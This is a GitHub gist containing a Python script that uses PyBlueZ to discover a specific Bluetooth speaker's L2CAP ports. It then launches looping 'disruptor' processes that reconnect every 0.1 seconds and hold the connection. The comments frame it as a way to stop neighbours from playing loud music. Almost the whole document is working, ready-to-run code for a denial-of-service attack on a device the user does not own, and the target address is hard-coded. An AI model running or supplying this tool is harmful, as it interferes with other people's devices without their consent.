Skip to content

Instantly share code, notes, and snippets.

@icedraco
Last active April 26, 2020 11:17
Show Gist options
  • Save icedraco/41fa34ca2c9401270eb816ac42249be7 to your computer and use it in GitHub Desktop.
Save icedraco/41fa34ca2c9401270eb816ac42249be7 to your computer and use it in GitHub Desktop.
Designed to aggressively hold an open connection to a Bluetooth speaker
# Bluetooth Speaker Hogging Script
#
# Designed to aggressively hold an open connection to a Bluetooth speaker.
#
# Particularly useful for when your neighbors have an "incompatible" taste in
# music and don't consider it a problem that they play it too loud.
#
# Requirements:
# sudo apt install libbluetooth-dev
# python3.7 -m pip install pybluez
from time import sleep
from multiprocessing import current_process, Process, Queue
from datetime import datetime
from typing import List
import bluetooth as bt
TARGET_BDADDR = 'A4:77:58:04:C6:C7' # Anker SoundCore
TARGET_PSM_LIST = [] # if you know the value(s) in advance, this will spare
# us the discovery run!
# reference: https://www.bluetooth.com/specifications/assigned-numbers/service-discovery/
SVC_CLASS_AUDIO_SINK = '110B'
def main() -> int:
log = mklog('main')
target_bdaddr: str = TARGET_BDADDR
target_psms: List[int] = TARGET_PSM_LIST
while not target_psms:
log(f'discovering target PSM (port) for {target_bdaddr}...')
target_psms = discover_psm_debug(target_bdaddr)
if target_psms:
log('PSM FOUND:')
for p in target_psms:
log(f' * {target_bdaddr} -> {p}')
log()
else:
sleep(0.5)
log('starting disruptors...')
disruptor_procs = [start_disruptor(target_bdaddr, psm) for psm in target_psms]
while True:
try:
[p.join() for p in disruptor_procs]
break
except KeyboardInterrupt:
# wait for sub-processes to close
pass
log('shutdown complete')
return 0
def p_disrupt(bdaddr: str, psm: int):
log = mklog()
log(f'Attempting to capture {bdaddr} (PSM {psm})...')
while True:
s = bt.BluetoothSocket(bt.L2CAP)
try:
s.connect((bdaddr, psm))
log(f'CONNECTED TO {bdaddr} (PSM {psm})')
data = True # placeholder for do-while
while data:
data = s.recv(1024) # blocking call
if data:
log(f'[{len(data)} bytes] {repr(data)}')
except KeyboardInterrupt:
log(f'CTRL+C -> SHUTTING DOWN...')
break
except bt.btcommon.BluetoothError as ex:
log(ex)
sleep(0.1)
except bt._bluetooth.error:
raise
finally:
s.close()
log(f'disruptor shut down')
def discover_psm(bdaddr: str) -> List[int]:
"""
Discover Bluetooth L2CAP PSM list for AudioSink service at the given
address.
:param bdaddr: Bluetooth address of the host we are probing
:return: list of discovered PSM values
"""
return [
c['port']
for c
in bt.find_service(uuid=SVC_CLASS_AUDIO_SINK, address=bdaddr)
]
def discover_psm_debug(bdaddr: str) -> List[int]:
services = bt.find_service(address=bdaddr)
for s in services:
print(f' * {repr(s)}')
return [c['port'] for c in services]
def start_disruptor(bdaddr: str, psm: int) -> Process:
"""
Start a disruptor process against a given Bluetooth service
:param bdaddr: Bluetooth address of the target host
:param psm: Bluetooth PSM (L2CAP port)
:return: Disruptor process (started)
"""
proc_name = f'DISRUPTOR-{psm}'
proc = Process(target=p_disrupt, args=(bdaddr, psm), name=proc_name, daemon=True)
proc.start()
return proc
def mklog(name: str = ''):
name = name or current_process().name
def log(msg: str = ''):
print(f'[{datetime.now()}][{name}] {msg}')
return log
if __name__ == '__main__':
raise SystemExit(main())
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment